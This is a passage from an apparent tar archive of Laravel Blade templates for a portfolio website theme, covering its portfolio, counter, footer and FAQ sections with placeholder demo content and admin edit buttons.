<div class="portfolio-item-inner"> <div class="portfolio-item-img"> <img src="{{ asset('uploads/img/dummy/600x600.jpg') }}" alt="Portfolio image" class="img-fluid"> <a href="{{ asset('uploads/img/dummy/600x600.jpg') }}" class="portfolio-zoom-link"> <i class="fas fa-search"></i> </a> </div> <div class="body"> <div class="portfolio-details"> <span>Mockup</span> <h5>Square Box</h5> </div> <a href="#" class="portfolio-link"> <i class="fa fa-arrow-right"></i> </a> </div> </div> </div> <div class="col-md-6 col-lg-4 portfolio-item ui"> <div class="portfolio-item-inner"> <div class="portfolio-item-img"> <img src="{{ asset('uploads/img/dummy/600x600.jpg') }}" alt="Portfolio image" class="img-fluid"> <a href="{{ asset('uploads/img/dummy/600x600.jpg') }}" class="portfolio-zoom-link"> <i class="fas fa-search"></i> </a> </div> <div class="body"> <div class="portfolio-details"> <span>Ui Design</span> <h5>Paper Design</h5> </div> <a href="#" class="portfolio-link"> <i class="fa fa-arrow-right"></i> </a> </div> </div> </div> <div class="col-md-6 col-lg-4 portfolio-item mockup"> <div class="portfolio-item-inner"> <div class="portfolio-item-img"> <img src="{{ asset('uploads/img/dummy/600x600.jpg') }}" alt="Portfolio image" class="img-fluid"> <a href="{{ asset('uploads/img/dummy/600x600.jpg') }}" class="portfolio-zoom-link"> <i class="fas fa-search"></i> </a> </div> <div class="body"> <div class="portfolio-details"> <span>Mockup</span> <h5>Business Card</h5> </div> <a href="#" class="portfolio-link"> <i class="fa fa-arrow-right"></i> </a> </div> </div> </div> </div> @endif @endif <div class="row"> @isset ($portfolio_section_style1) <div class="col-md-12 text-center"> <a href="{{ $portfolio_section_style1->button_url }}" class="primary-btn"> <span class="text">{{ $portfolio_section_style1->button_name }}</span> <span class="icon"><i class="fa fa-arrow-right"></i></span> </a> </div> @else @if (Auth::user() || $draft_view == null || $draft_view->status == 'enable') <div class="col-md-12 text-center"> <a href="javascript:void(0)" class="primary-btn"> <span class="text">Get Started</span> <span class="icon"><i class="fa fa-arrow-right"></i></span> </a> </div> @endif @endisset </div> </div> </section> <!--// My Works End //--> @if(Auth::user()) @can('portfolio check') </div> <div class="easier-middle"> @php $url = request()->path(); $modified_url = str_replace('/', '-bracket-', $url); @endphp <form method="POST" action="{{ route('site-url.index') }}" class="d-inline-block"> @csrf <input type="hidden" name="route" value="portfolio.index"> <input type="hidden" name="style" value="style1"> <input type="hidden" name="site_url" value="{{ $modified_url }}"> <button type="submit" class="custom-btn text-white me-2 mb-2"> <i class="fa fa-edit text-white"></i> {{ __('content.edit_section_title_description') }} </button> </form> <form method="POST" action="{{ route('site-url.index') }}" class="d-inline-block"> @csrf <input type="hidden" name="route" value="portfolio.create"> <input type="hidden" name="style" value="style1"> <input type="hidden" name="site_url" value="{{ $modified_url }}"> <button type="submit" class="custom-btn text-white"> <i class="fa fa-plus text-white"></i> {{ __('content.add_portfolio') }} </button> </form> </div> </div> @endcan @endif ���������������������������������������������������������������������������������������������������������������������������������������������������������������������������views/frontend/sections/portfolio/portfolio-style2.blade.php����������������������������������������0000644�����������������00000041513�14765366572�0020431 0����������������������������������������������������������������������������������������������������ustar�00�������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������@if(Auth::user()) @can('portfolio check') <div class="easier-mode"> <div class="easier-section-area"> @endcan @endif <!--// My Works Start //--> <section class="section bg-primary-light"> <div class="container"> @if(Auth::user()) @can('portfolio check') <!-- hover effect for mobile devices --> <div class="click-icon d-md-none text-center"> <button class="custom-btn text-white"> <i class="fa fa-mobile-alt text-white"></i> {{ __('content.touch') }} </button> </div> @endcan @endif <div class="row"> <div class="col-md-12"> @if (is_countable($portfolio_count_categories) && count($portfolio_count_categories) > 0) <div class="text-center mb-5 custom-category-link"> <a href="{{ url($page_builder->page_uri) }}" class="current mb-2">{{ __('frontend.all_portfolio') }}</a> @foreach ($portfolio_count_categories as $portfolio_count_category) @if (isset($portfolio_count_category->portfolio_category->portfolio_category_slug)) <a class="mb-2" href="{{ route('default-portfolio-category-index', $portfolio_count_category->portfolio_category->portfolio_category_slug) }}">{{$portfolio_count_category->portfolio_category->category_name }} ({{ $portfolio_count_category->category_count }})</a> @endif @endforeach @unset ($portfolio_count_category) </div> @else @if (Auth::user() || $draft_view == null || $draft_view->status == 'enable') <div class="text-center mb-5 custom-category-link"> <a href="#" class="link-dark">Creative</a> <a href="#" class="link-secondary">Business</a> <a href="#" class="link-secondary">UI / UX Design</a> <a href="#" class="link-secondary">Marketing</a> </div> @endif @endif </div> </div> @if (is_countable($portfolios_paginate_style) && count($portfolios_paginate_style) > 0) <div class="row portfolio-grid" id="portfolio-masonry-wrap"> @foreach ($portfolios_paginate_style as $item) <div class="col-md-6 col-lg-4 portfolio-item {{ $item->portfolio_category->portfolio_category_slug }}"> @if(Auth::user()) @can('portfolio check') @php $url = request()->path(); $modified_url = str_replace('/', '-bracket-', $url); @endphp <form method="POST" action="{{ route('site-url.index') }}" class="d-inline-block"> @csrf <input type="hidden" name="route" value="portfolio.edit"> <input type="hidden" name="single_id" value="{{ $item->id }}"> <input type="hidden" name="site_url" value="{{ $modified_url }}"> <button type="submit" class="me-2 custom-pure-button "> <i class="fa fa-edit text-info easier-custom-font-size-24"></i> </button> </form> @endcan @endif <div class="portfolio-item-inner"> @if (!empty($item->section_image)) <div class="portfolio-item-img"> <img src="{{ asset('uploads/img/portfolio/'.$item->section_image) }}" alt="Portfolio image" class="img-fluid"> <a href="{{ asset('uploads/img/portfolio/'.$item->section_image) }}" class="portfolio-zoom-link"> <i class="fas fa-search"></i> </a> </div> @endif <div class="body"> <div class="portfolio-details"> <span>{{ $item->portfolio_category->category_name }}</span> <h5>{{ $item->title }}</h5> </div> @if (!empty($item->url)) <a href="{{ $item->url }}" class="portfolio-link"> <i class="fa fa-arrow-right"></i> </a> @else <a href="{{ route('default-portfolio-detail-show', ['portfolio_slug' => $item->portfolio_slug]) }}" class="portfolio-link"> <i class="fa fa-arrow-right"></i> </a> @endif </div> </div> </div> @endforeach @unset ($item) </div> <div class="row mt-5"> <div class="col-xl-12"> <div class="easier-pagination-container"> {{ $portfolios_paginate_style->links() }} </div> </div> </div> @else @if (Auth::user() || $draft_view == null || $draft_view->status == 'enable') <div class="row portfolio-grid" id="portfolio-masonry-wrap"> <div class="col-md-6 col-lg-4 portfolio-item mockup"> <div class="portfolio-item-inner"> <div class="portfolio-item-img"> <img src="{{ asset('uploads/img/dummy/600x600.jpg') }}" alt="Portfolio image" class="img-fluid"> <a href="{{ asset('uploads/img/dummy/600x600.jpg') }}" class="portfolio-zoom-link"> <i class="fas fa-search"></i> </a> </div> <div class="body"> <div class="portfolio-details"> <span>Mockup</span> <h5>Card Mockup</h5> </div> <a href="#" class="portfolio-link"> <i class="fa fa-arrow-right"></i> </a> </div> </div> </div> <div class="col-md-6 col-lg-4 portfolio-item mockup"> <div class="portfolio-item-inner"> <div class="portfolio-item-img"> <img src="{{ asset('uploads/img/dummy/600x600.jpg') }}" alt="Portfolio image" class="img-fluid"> <a href="{{ asset('uploads/img/dummy/600x600.jpg') }}" class="portfolio-zoom-link"> <i class="fas fa-search"></i> </a> </div> <div class="body"> <div class="portfolio-details"> <span>Mockup</span> <h5>Mockup Box</h5> </div> <a href="#" class="portfolio-link"> <i class="fa fa-arrow-right"></i> </a> </div> </div> </div> <div class="col-md-6 col-lg-4 portfolio-item mockup"> <div class="portfolio-item-inner"> <div class="portfolio-item-img"> <img src="{{ asset('uploads/img/dummy/600x600.jpg') }}" alt="Portfolio image" class="img-fluid"> <a href="{{ asset('uploads/img/dummy/600x600.jpg') }}" class="portfolio-zoom-link"> <i class="fas fa-search"></i> </a> </div> <div class="body"> <div class="portfolio-details"> <span>Mockup</span> <h5>Coffee Mockup</h5> </div> <a href="#" class="portfolio-link"> <i class="fa fa-arrow-right"></i> </a> </div> </div> </div> <div class="col-md-6 col-lg-4 portfolio-item mockup"> <div class="portfolio-item-inner"> <div class="portfolio-item-img"> <img src="{{ asset('uploads/img/dummy/600x600.jpg') }}" alt="Portfolio image" class="img-fluid"> <a href="{{ asset('uploads/img/dummy/600x600.jpg') }}" class="portfolio-zoom-link"> <i class="fas fa-search"></i> </a> </div> <div class="body"> <div class="portfolio-details"> <span>Mockup</span> <h5>Square Box</h5> </div> <a href="#" class="portfolio-link"> <i class="fa fa-arrow-right"></i> </a> </div> </div> </div> <div class="col-md-6 col-lg-4 portfolio-item ui"> <div class="portfolio-item-inner"> <div class="portfolio-item-img"> <img src="{{ asset('uploads/img/dummy/600x600.jpg') }}" alt="Portfolio image" class="img-fluid"> <a href="{{ asset('uploads/img/dummy/600x600.jpg') }}" class="portfolio-zoom-link"> <i class="fas fa-search"></i> </a> </div> <div class="body"> <div class="portfolio-details"> <span>Ui Design</span> <h5>Paper Design</h5> </div> <a href="#" class="portfolio-link"> <i class="fa fa-arrow-right"></i> </a> </div> </div> </div> <div class="col-md-6 col-lg-4 portfolio-item mockup"> <div class="portfolio-item-inner"> <div class="portfolio-item-img"> <img src="{{ asset('uploads/img/dummy/600x600.jpg') }}" alt="Portfolio image" class="img-fluid"> <a href="{{ asset('uploads/img/dummy/600x600.jpg') }}" class="portfolio-zoom-link"> <i class="fas fa-search"></i> </a> </div> <div class="body"> <div class="portfolio-details"> <span>Mockup</span> <h5>Business Card</h5> </div> <a href="#" class="portfolio-link"> <i class="fa fa-arrow-right"></i> </a> </div> </div> </div> </div> @endif @endif </div> </section> <!--// My Works End //--> @if(Auth::user()) @can('portfolio check') </div> <div class="easier-middle"> @php $url = request()->path(); $modified_url = str_replace('/', '-bracket-', $url); @endphp <form method="POST" action="{{ route('site-url.index') }}" class="d-inline-block"> @csrf <input type="hidden" name="route" value="portfolio.index"> <input type="hidden" name="style" value="style1"> <input type="hidden" name="site_url" value="{{ $modified_url }}"> <button type="submit" class="custom-btn text-white me-2 mb-2"><i class="fa fa-edit text-white"></i> {{ __('content.edit_section_title_description') }}</button> </form> <form method="POST" action="{{ route('site-url.index') }}" class="d-inline-block"> @csrf <input type="hidden" name="route" value="portfolio.create"> <input type="hidden" name="style" value="style1"> <input type="hidden" name="site_url" value="{{ $modified_url }}"> <button type="submit" class="custom-btn text-white me-2 mb-2"><i class="fa fa-plus text-white"></i> {{ __('content.add_portfolio') }}</button> </form> </div> </div> @endcan @endif �������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������views/frontend/sections/counter/counter-style1.blade.php��������������������������������������������0000644�����������������00000016573�14765366572�0017544 0����������������������������������������������������������������������������������������������������ustar�00�������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������@if(Auth::user()) @can('section check') <div class="easier-mode"> <div class="easier-section-area"> @endcan @endif <!--// Counter Section Start //--> <section class="section pb-minus-70" id="counters"> <div class="container"> @if(Auth::user()) @can('section check') <!-- hover effect for mobile devices --> <div class="click-icon d-md-none text-center"> <button class="custom-btn text-white"> <i class="fa fa-mobile-alt text-white"></i> {{ __('content.touch') }} </button> </div> @endcan @endif @isset ($counter_section_style1) <div class="row justify-content-center"> <div class="col-lg-6"> <div class="section-heading light"> <span>@php echo html_entity_decode($counter_section_style1->section_title); @endphp</span> <h2>@php echo html_entity_decode($counter_section_style1->title); @endphp</h2> </div> </div> </div> @else @if (Auth::user() || $draft_view == null || $draft_view->status == 'enable') <div class="row justify-content-center"> <div class="col-lg-6"> <div class="section-heading light"> <span>Counters</span> <h2>More than 10,000 customers trusted me</h2> </div> </div> </div> @endif @endisset @if (is_countable($counters_style1) && count($counters_style1) > 0) <div class="row"> @foreach ($counters_style1 as $item) <div class="col-md-4 wow fadeInUp" data-wow-duration="0.7s" data-wow-delay="0.1s"> <div class="counter-item"> @if(Auth::user()) @can('section check') @php $url = request()->path(); $modified_url = str_replace('/', '-bracket-', $url); @endphp <form method="POST" action="{{ route('site-url.index') }}" class="d-inline-block"> @csrf <input type="hidden" name="route" value="counter.edit"> <input type="hidden" name="single_id" value="{{ $item->id }}"> <input type="hidden" name="site_url" value="{{ $modified_url }}"> <button type="submit" class="me-2 custom-pure-button "> <i class="fa fa-edit text-info easier-custom-font-size-24"></i> </button> </form> @endcan @endif <h3 class="counter">{{ $item->timer }}</h3> <p>{{ $item->title }}</p> </div> </div> @endforeach @unset ($item) </div> @else @if (Auth::user() || $draft_view == null || $draft_view->status == 'enable') <div class="row"> <div class="col-md-4 wow fadeInUp" data-wow-duration="0.7s" data-wow-delay="0.1s"> <div class="counter-item"> <h3 class="counter">5,700</h3> <p>Happy Customer</p> </div> </div> <div class="col-md-4 wow fadeInUp" data-wow-duration="0.7s" data-wow-delay="0.3s"> <div class="counter-item"> <h3 class="counter">500</h3> <p>Project Complete</p> </div> </div> <div class="col-md-4 wow fadeInUp" data-wow-duration="0.7s" data-wow-delay="0.1s"> <div class="counter-item"> <h3 class="counter">1,250</h3> <p>Cups Of Coffee</p> </div> </div> </div> @endif @endif </div> </section> <!--// Counter Section End //--> @if(Auth::user()) @can('section check') </div> <div class="easier-middle"> @php $url = request()->path(); $modified_url = str_replace('/', '-bracket-', $url); @endphp <form method="POST" action="{{ route('site-url.index') }}" class="d-inline-block"> @csrf <input type="hidden" name="route" value="counter.create"> <input type="hidden" name="style" value="style1"> <input type="hidden" name="site_url" value="{{ $modified_url }}"> <button type="submit" class="custom-btn text-white me-2 mb-2"> <i class="fa fa-edit text-white"></i> {{ __('content.edit_section_title_description') }} </button> </form> <form method="POST" action="{{ route('site-url.index') }}" class="d-inline-block"> @csrf <input type="hidden" name="route" value="counter.create"> <input type="hidden" name="style" value="style1"> <input type="hidden" name="site_url" value="{{ $modified_url }}"> <button type="submit" class="custom-btn text-white"> <i class="fa fa-plus text-white"></i> {{ __('content.add_counter') }} </button> </form> </div> </div> @endcan @endif �������������������������������������������������������������������������������������������������������������������������������������views/frontend/sections/footer/footer-style1.blade.php����������������������������������������������0000644�����������������00000044700�14765366572�0017173 0����������������������������������������������������������������������������������������������������ustar�00�������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������@if(Auth::user()) <div class="easier-mode"> <div class="easier-section-area"> @endif <!--// Footer Start //--> <footer class="footer"> <div class="footer-top"> <div class="container"> @if(Auth::user()) @can('section check') <!-- hover effect for mobile devices --> <div class="click-icon d-md-none text-center"> <button class="custom-btn text-white"> <i class="fa fa-mobile-alt text-white"></i> {{ __('content.touch') }} </button> </div> @endcan @endif <div class="row"> <div class="col-md-6 col-lg-4 footer-widget-resp"> <div class="footer-widget"> <h6 class="footer-title">{{ __('frontend.about_us') }}</h6> @isset ($footer_image_style1) @if (!empty($footer_image_style1->section_image)) <a href="{{ url('/') }}"> <img src="{{ asset('uploads/img/general/'.$footer_image_style1->section_image) }}" alt="footer logo" class="img-fluid footer-logo"> </a> @endif @else @if (Auth::user() || $draft_view == null || $draft_view->status == 'enable') <a href="#"> <img src="{{ asset('uploads/img/dummy/your-logo.jpg') }}" alt="footer logo" class="img-fluid footer-logo"> </a> @endif @endisset @isset($site_info) <p class="footer-desc">{{ $site_info->description }}</p> @else @if (Auth::user() || $draft_view == null || $draft_view->status == 'enable') <p class="footer-desc"> It is a long established fact that a reader will be distracted by the readable content.. </p> @endif @endisset @if (is_countable($socials) && count($socials) > 0) <div class="footer-social-links"> @foreach ($socials as $social) @if ($social->social_media == 'fab fa-twitter') <a class="border border-0" href="{{ $social->url }}"><img src="{{ asset('uploads/img/dummy/x-twitter-white.svg') }}" alt="x icon"></a> @else <a href="{{ $social->url }}"><i class="{{ $social->social_media }}"></i></a> @endif @endforeach @unset ($social) </div> @else @if (Auth::user() || $draft_view == null || $draft_view->status == 'enable') <div class="footer-social-links"> <a href="javascript:void(0)"> <i class="fab fa-facebook-f"></i> </a> <a href="javascript:void(0)"> <i class="fab fa-twitter"></i> </a> <a href="javascript:void(0)"> <i class="fab fa-instagram"></i> </a> <a href="javascript:void(0)"> <i class="fab fa-youtube"></i> </a> </div> @endif @endif </div> </div> @if (is_countable($footer_categories) && count($footer_categories) > 0) @foreach ($footer_categories as $footer_category) <div class="col-md-6 col-lg-4 footer-widget-resp"> <div class="footer-widget footer-widget-pl"> <h6 class="footer-title">{{ $footer_category->category_name }}</h6> <ul class="footer-links"> @foreach ($footers as $footer) @if ($footer_category->category_name == $footer->category_name) <li><a href="{{ $footer->url }}">{{ $footer->title }}</a></li> @endif @endforeach @unset ($footer) </ul> </div> </div> @endforeach @unset ($footer_category) @else @if (Auth::user() || $draft_view == null || $draft_view->status == 'enable') <div class="col-md-6 col-lg-4 footer-widget-resp"> <div class="footer-widget footer-widget-pl"> <h6 class="footer-title">Usefull Links</h6> <ul class="footer-links"> <li> <a href="javascript:void(0)">My Team</a> </li> <li> <a href="javascript:void(0)">My Services</a> </li> <li> <a href="javascript:void(0)">My Resume</a> </li> <li> <a href="javascript:void(0)">My Works</a> </li> <li> <a href="javascript:void(0)">Get in Touch</a> </li> <li> <a href="javascript:void(0)">Privacy Policy</a> </li> </ul> </div> </div> @endif @endif @isset ($contact_info_widget_style1) <div class="col-md-6 col-lg-4 footer-widget-resp"> <div class="footer-widget"> <h6 class="footer-title">{{ $contact_info_widget_style1->title }}</h6> <div class="footer-contact-info-wrap"> <ul class="footer-contact-info-list"> @if (!empty($contact_info_widget_style1->address)) <li> <p>{{ $contact_info_widget_style1->description }}</p> </li> @endif @if (!empty($contact_info_widget_style1->address)) <li> <h6><i class="far fa-map custom-color-orange"></i> {{ __('frontend.address') }}</h6> <p>@php echo html_entity_decode($contact_info_widget_style1->address); @endphp</p> </li> @endif @if (!empty($contact_info_widget_style1->email)) <li> <h6><i class="far fa-envelope custom-color-orange"></i> {{ __('frontend.email') }}</h6> <div class="text"> <p><a class="text-white" href="mailto:{{ $contact_info_widget_style1->email }}">{{ $contact_info_widget_style1->email }}</a></p> </div> </li> @endif @if (!empty($contact_info_widget_style1->phone)) <li> <h6><i class="fas fa-phone custom-color-orange"></i> {{ __('frontend.phone') }}</h6> <div class="text"> <p><a class="text-white" href="tel:{{ $contact_info_widget_style1->phone }}">{{ $contact_info_widget_style1->phone }}</a></p> </div> </li> @endif @if (!empty($contact_info_widget_style1->working_hour)) <li> <h6><i class="fas fa-clock custom-color-orange"></i> {{ __('frontend.working_hour') }}</h6> <div class="text"> <p>{{ $contact_info_widget_style1->working_hour }}</p> </div> </li> @endif </ul> </div> </div> </div> @else @if (Auth::user() || $draft_view == null || $draft_view->status == 'enable') <div class="col-md-6 col-lg-4 footer-widget-resp"> <div class="footer-widget"> <h6 class="footer-title">Contact Info</h6> <div class="footer-contact-info-wrap"> <ul class="footer-contact-info-list"> <li> <h6>Address:</h6> <p> 1395 Nixon Avenue Etowah, TN 37331 <br>United States </p> </li> <li> <h6>E-Mail & Phone:</h6> <div class="text"> <p>+1 422-200-5555</p> <p>elsecolor@gmail.com</p> </div> </li> </ul> </div> </div> </div> @endif @endif </div> </div> </div> @isset ($site_info) @if (!empty($site_info->copyright)) <div class="copyright"> <div class="container"> <p class="copyright-text">@php echo html_entity_decode($site_info->copyright); @endphp</p> </div> </div> @endif @else @if (Auth::user() || $draft_view == null || $draft_view->status == 'enable') <div class="copyright"> <div class="container"> <p class="copyright-text">© Copyright 2024. Powered By ElseColor</p> </div> </div> @endif @endisset </footer> <!--// Footer End //--> @if(Auth::user()) </div> <div class="easier-middle"> @php $url = request()->path(); $modified_url = str_replace('/', '-bracket-', $url); @endphp @can('setting check') <form method="POST" action="{{ route('site-url.index') }}" class="d-inline-block"> @csrf <input type="hidden" name="route" value="footer-image.create"> <input type="hidden" name="style" value="style1"> <input type="hidden" name="site_url" value="{{ $modified_url }}"> <button type="submit" class="custom-btn text-white me-2 mb-2"> <i class="fa fa-edit text-white"></i> {{ __('content.edit_footer_image') }} </button> </form> <form method="POST" action="{{ route('site-url.index') }}" class="d-inline-block"> @csrf <input type="hidden" name="route" value="site-info.create"> <input type="hidden" name="style" value=""> <input type="hidden" name="site_url" value="{{ $modified_url }}"> <button type="submit" class="custom-btn text-white me-2 mb-2"> <i class="fa fa-edit text-white"></i> {{ __('content.edit_site_info') }} </button> </form> @endcan @can('section check') <form method="POST" action="{{ route('site-url.index') }}" class="d-inline-block"> @csrf <input type="hidden" name="route" value="footer.create"> <input type="hidden" name="style" value=""> <input type="hidden" name="site_url" value="{{ $modified_url }}"> <button type="submit" class="custom-btn text-white me-2 mb-2"> <i class="fa fa-plus text-white"></i> {{ __('content.add_footer') }} </button> </form> @endcan @can('setting check') <form method="POST" action="{{ route('site-url.index') }}" class="d-inline-block"> @csrf <input type="hidden" name="route" value="contact-info-widget.create"> <input type="hidden" name="style" value="style1"> <input type="hidden" name="site_url" value="{{ $modified_url }}"> <button type="submit" class="custom-btn text-white me-2 mb-2"> <i class="fa fa-plus text-white"></i> {{ __('content.add_contact_info') }} </button> </form> <form method="POST" action="{{ route('site-url.index') }}" class="d-inline-block"> @csrf <input type="hidden" name="route" value="social.create"> <input type="hidden" name="style" value=""> <input type="hidden" name="site_url" value="{{ $modified_url }}"> <button type="submit" class="custom-btn text-white"> <i class="fa fa-plus text-white"></i> {{ __('content.add_social') }} </button> </form> @endcan </div> </div> @endif ����������������������������������������������������������������views/frontend/sections/faq/faq-style1.blade.php����������������������������������������������������0000644�����������������00000052257�14765366572�0015723 0����������������������������������������������������������������������������������������������������ustar�00�������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������@if(Auth::user()) @can('section check') <div class="easier-mode"> <div class="easier-section-area"> @endcan @endif <!--// Frequently Asked Questions Section Start //--> <section class="section" id="faqsection"> <div class="container"> @if(Auth::user()) @can('section check') <!-- hover effect for mobile devices --> <div class="click-icon d-md-none text-center"> <button class="custom-btn text-white"> <i class="fa fa-mobile-alt text-white"></i> {{ __('content.touch') }} </button> </div> @endcan @endif @isset($faq_section_style1) <div class="row justify-content-center"> <div class="col-lg-6"> <div class="section-heading"> <span>@php echo html_entity_decode($faq_section_style1->section_title); @endphp</span> <h2>@php echo html_entity_decode($faq_section_style1->title); @endphp</h2> </div> </div> </div> @else @if (Auth::user() || $draft_view == null || $draft_view->status == 'enable') <div class="row justify-content-center"> <div class="col-lg-6"> <div class="section-heading"> <span>FAQ</span> <h2>Frequently Asked <br> Questions</h2> </div> </div> </div> @endif @endisset @if (is_countable($faqs_style1) && count($faqs_style1) > 0) @php $the_number_of_faqs = count($faqs_style1); if ($the_number_of_faqs %2 == 0) { $half_of_faqs = $the_number_of_faqs / 2 + 1; } else { $half_of_faqs = (integer)($the_number_of_faqs / 2) + 2; } @endphp <div class="row"> <div class="col-lg-6"> @foreach ($faqs_style1 as $faq_style1) @if ($loop->iteration < $half_of_faqs) @if(Auth::user()) @can('section check') @php $url = request()->path(); $modified_url = str_replace('/', '-bracket-', $url); @endphp <form method="POST" action="{{ route('site-url.index') }}" class="d-inline-block"> @csrf <input type="hidden" name="route" value="faq.edit"> <input type="hidden" name="single_id" value="{{ $faq_style1->id }}"> <input type="hidden" name="site_url" value="{{ $modified_url }}"> <button type="submit" class="me-2 custom-pure-button "> <i class="fa fa-edit text-info easier-custom-font-size-24"></i> </button> </form> @endcan @endif <div class="accordion-item"> <div class="accordion-item-header" id="accordionHeadingOne{{ $loop->iteration }}"> <a href="#" data-bs-toggle="collapse" data-bs-target="#accordionItemOne{{ $loop->iteration }}" aria-expanded="false" aria-controls="accordionItemOne{{ $loop->iteration }}" class="collapsed"> <i class="fas fa-question"></i> <span>{{ $faq_style1->question }}</span> </a> </div> <div id="accordionItemOne{{ $loop->iteration }}" class="collapse" aria-labelledby="accordionHeadingOne{{ $loop->iteration }}" style=""> <div class="accordion-body"> <p>@php echo html_entity_decode($faq_style1->answer); @endphp</p> </div> </div> </div> @else @break @endif @endforeach @unset ($faq_style1) </div> <div class="col-lg-6 accordion-resp-mt"> @foreach ($faqs_style1 as $faq_style1) @if ($loop->iteration >= $half_of_faqs) @if(Auth::user()) @can('section check') @php $url = request()->path(); $modified_url = str_replace('/', '-bracket-', $url); @endphp <form method="POST" action="{{ route('site-url.index') }}" class="d-inline-block"> @csrf <input type="hidden" name="route" value="faq.edit"> <input type="hidden" name="single_id" value="{{ $faq_style1->id }}"> <input type="hidden" name="site_url" value="{{ $modified_url }}"> <button type="submit" class="me-2 custom-pure-button "> <i class="fa fa-edit text-info easier-custom-font-size-24"></i> </button> </form> @endcan @endif <div class="accordion-item"> <div class="accordion-item-header" id="accordionHeadingTwo{{ $loop->iteration }}"> <a href="#" data-bs-toggle="collapse" data-bs-target="#accordionItemTwo{{ $loop->iteration }}" aria-expanded="false" aria-controls="accordionItemTwo{{ $loop->iteration }}" class="collapsed"> <i class="fas fa-question"></i> <span>{{ $faq_style1->question }}</span> </a> </div> <div id="accordionItemTwo{{ $loop->iteration }}" class="collapse" aria-labelledby="accordionHeadingTwo{{ $loop->iteration }}" style=""> <div class="accordion-body"> <p>@php echo html_entity_decode($faq_style1->answer); @endphp</p> </div> </div> </div> @endif @endforeach @unset ($faq_style1) </div> </div> @else @if (Auth::user() || $draft_view == null || $draft_view->status == 'enable') <div class="row"> <div class="col-lg-6"> <div class="accordion-item"> <div class="accordion-item-header" id="accordionHeadingOne"> <a href="#" data-bs-toggle="collapse" data-bs-target="#accordionItemOne" aria-expanded="false" aria-controls="accordionItemOne" class="collapsed"> <i class="fas fa-question"></i> <span>How Are The Packages Updated ?</span> </a> </div> <div id="accordionItemOne" class="collapse" aria-labelledby="accordionHeadingOne" style=""> <div class="accordion-body"> <p> It is a long established fact that a reader will be distracted by the readable content of a page when looking at its layout. The point of using Lorem Ipsum is that it has a more-or-less normal distribution of letters, as opposed to using 'Content here, content here', making it look like readable English. </p> </div> </div> </div> <div class="accordion-item"> <div class="accordion-item-header" id="accordionHeaderTwo"> <a href="#" data-bs-toggle="collapse" data-bs-target="#accordionItemTwo" aria-expanded="false" aria-controls="accordionItemTwo"> <i class="fas fa-question"></i> <span>How to install this program?</span> </a> </div> <div id="accordionItemTwo" class="collapse" aria-labelledby="accordionHeaderTwo"> <div class="accordion-body"> <p> It is a long established fact that a reader will be distracted by the readable content of a page when looking at its layout. The point of using Lorem Ipsum is that it has a more-or-less normal distribution of letters, as opposed to using 'Content here, content here', making it look like readable English. </p> </div> </div> </div> <div class="accordion-item"> <div class="accordion-item-header" id="accordionHeaderThree"> <a href="#" data-bs-toggle="collapse" data-bs-target="#accordionItemThree" aria-expanded="false" aria-controls="accordionItemThree"> <i class="fas fa-question"></i> <span>How do I edit the dashboard panel?</span> </a> </div> <div id="accordionItemThree" class="collapse" aria-labelledby="accordionHeaderThree"> <div class="accordion-body"> <p> It is a long established fact that a reader will be distracted by the readable content of a page when looking at its layout. The point of using Lorem Ipsum is that it has a more-or-less normal distribution of letters, as opposed to using 'Content here, content here', making it look like readable English. </p> </div> </div> </div> </div> <div class="col-lg-6 accordion-resp-mt"> <div class="accordion-item"> <div class="accordion-item-header" id="accordionHeadingFour"> <a href="#" data-bs-toggle="collapse" data-bs-target="#accordionItemFour" aria-expanded="false" aria-controls="accordionItemFour" class="collapsed"> <i class="fas fa-question"></i> <span>How do i get new updates for free?</span> </a> </div> <div id="accordionItemFour" class="collapse" aria-labelledby="accordionHeadingFour" style=""> <div class="accordion-body"> <p> It is a long established fact that a reader will be distracted by the readable content of a page when looking at its layout. The point of using Lorem Ipsum is that it has a more-or-less normal distribution of letters, as opposed to using 'Content here, content here', making it look like readable English. </p> </div> </div> </div> <div class="accordion-item"> <div class="accordion-item-header" id="accordionHeaderFive"> <a href="#" data-bs-toggle="collapse" data-bs-target="#accordionItemFive" aria-expanded="false" aria-controls="accordionItemFive"> <i class="fas fa-question"></i> <span>How can I upload a screenshot?</span> </a> </div> <div id="accordionItemFive" class="collapse" aria-labelledby="accordionHeaderFive"> <div class="accordion-body"> <p> It is a long established fact that a reader will be distracted by the readable content of a page when looking at its layout. The point of using Lorem Ipsum is that it has a more-or-less normal distribution of letters, as opposed to using 'Content here, content here', making it look like readable English. </p> </div> </div> </div> <div class="accordion-item"> <div class="accordion-item-header" id="accordionHeaderSix"> <a href="#" data-bs-toggle="collapse" data-bs-target="#accordionItemSix" aria-expanded="false" aria-controls="accordionItemSix"> <i class="fas fa-question"></i> <span>How do I activate multiple users?</span> </a> </div> <div id="accordionItemSix" class="collapse" aria-labelledby="accordionHeaderSix"> <div class="accordion-body"> <p> It is a long established fact that a reader will be distracted by the readable content of a page when looking at its layout. The point of using Lorem Ipsum is that it has a more-or-less normal distribution of letters, as opposed to using 'Content here, content here', making it look like readable English. </p> </div> </div> </div> </div> </div> @endif @endif </div> </section> <!--// Frequently Asked Questions Section End //--> @if(Auth::user()) @can('section check') </div> <div class="easier-middle"> @php $url = request()->path(); $modified_url = str_replace('/', '-bracket-', $url); @endphp <form method="POST" action="{{ route('site-url.index') }}" class="d-inline-block"> @csrf <input type="hidden" name="route" value="faq.create"> <input type="hidden" name="style" value="style1"> <input type="hidden" name="site_url" value="{{ $modified_url }}"> <button type="submit" class="custom-btn text-white me-2 mb-2"> <i class="fa fa-edit text-white"></i> {{ __('content.edit_section_title_description') }} </button> </form> <form method="POST" action="{{ route('site-url.index') }}" class="d-inline-block"> @csrf <input type="hidden" name="route" value="faq.create"> <input type="hidden" name="style" value="style1"> <input type="hidden" name="site_url" value="{{ $modified_url }}"> <button type="submit" class="custom-btn text-white"> <i class="fa fa-plus text-white"></i> {{ __('content.add_faq') }} </button> </form> </div> </div> @endcan @endif �������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������views/frontend/sections/faq/faq-style2.blade.php����������������������������������������������������0000644�����������������00000052257�14765366572�0015724 